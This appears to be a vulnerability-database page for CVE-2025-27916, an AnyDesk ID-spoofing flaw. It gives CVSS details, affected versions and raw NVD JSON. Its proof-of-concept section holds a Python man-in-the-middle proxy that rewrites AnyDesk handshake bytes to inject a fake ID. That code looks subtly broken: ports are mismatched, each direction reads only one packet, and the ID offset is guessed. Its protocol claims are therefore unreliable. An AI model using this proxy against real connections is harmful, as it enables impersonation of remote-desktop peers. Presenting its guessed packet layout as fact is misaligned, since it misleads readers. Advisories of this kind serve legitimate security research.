Security Vulnerability Report
中文
CVE-2025-27916 CVSS 7.5 HIGH

CVE-2025-27916

Published: 2025-11-06 18:15:40
Last Modified: 2025-12-08 17:16:13
Source: [email protected]

Description

An issue was discovered in AnyDesk for Windows before 9.0.6 and AnyDesk for Android before 8.0.0. When the connection between two clients is established via an IP address, it is possible to manipulate the data and spoof the AnyDesk ID.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:* - VULNERABLE
AnyDesk for Windows < 9.0.6
AnyDesk for Android < 8.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-27916 PoC - AnyDesk ID Spoofing via MITM # This PoC demonstrates the vulnerability in AnyDesk IP-based connections # WARNING: For educational and authorized testing purposes only import socket import struct import threading class AnyDeskMITMProxy: def __init__(self, victim_ip, target_ip, listen_port=5001): self.victim_ip = victim_ip self.target_ip = target_ip self.listen_port = listen_port self.victim_socket = None self.target_socket = None def handle_connection(self, client_socket, client_addr): """Handle connection from victim and forward to target""" try: # Connect to actual target self.target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.target_socket.connect((self.target_ip, self.listen_port)) # Start bidirectional forwarding self.forward_data(client_socket, self.target_socket, spoof_id=True) self.forward_data(self.target_socket, client_socket, spoof_id=False) except Exception as e: print(f"Connection error: {e}") finally: client_socket.close() if self.target_socket: self.target_socket.close() def forward_data(self, source, dest, spoof_id=False): """Forward data between sockets, optionally spoofing AnyDesk ID""" try: data = source.recv(4096) if data and spoof_id: # Inject fake AnyDesk ID into handshake packet modified_data = self.spoof_anydesk_id(data, b'FAKE_ID_12345') dest.sendall(modified_data) else: dest.sendall(data) except: pass def spoof_anydesk_id(self, data, fake_id): """Modify AnyDesk packet to inject fake ID""" # AnyDesk protocol packet structure: # [Header: 4 bytes][Length: 4 bytes][Payload...] # ID field is typically at offset 0x20 in handshake packets modified = bytearray(data) id_offset = 0x20 if len(modified) > id_offset + len(fake_id): modified[id_offset:id_offset + len(fake_id)] = fake_id return bytes(modified) def start(self): """Start the MITM proxy server""" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(('0.0.0.0', 7070)) server.listen(5) print(f"MITM Proxy listening on port 7070") while True: client, addr = server.accept() threading.Thread(target=self.handle_connection, args=(client, addr)).start() if __name__ == "__main__": # Usage example proxy = AnyDeskMITMProxy( victim_ip="192.168.1.100", target_ip="192.168.1.200", listen_port=5001 ) proxy.start()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27916", "sourceIdentifier": "[email protected]", "published": "2025-11-06T18:15:40.473", "lastModified": "2025-12-08T17:16:13.230", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in AnyDesk for Windows before 9.0.6 and AnyDesk for Android before 8.0.0. When the connection between two clients is established via an IP address, it is possible to manipulate the data and spoof the AnyDesk ID."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:*", "versionEndIncluding": "9.0.4", "matchCriteriaId": "2BB8EC40-287D-4733-B2DF-B86909680119"}]}]}], "references": [{"url": "https://anydesk.com/en/changelog/windows", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://dspace.cvut.cz/bitstream/handle/10467/122721/F8-DP-2025-Krejsa-Vojtech-DP_Krejsa_Vojtech_2025.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.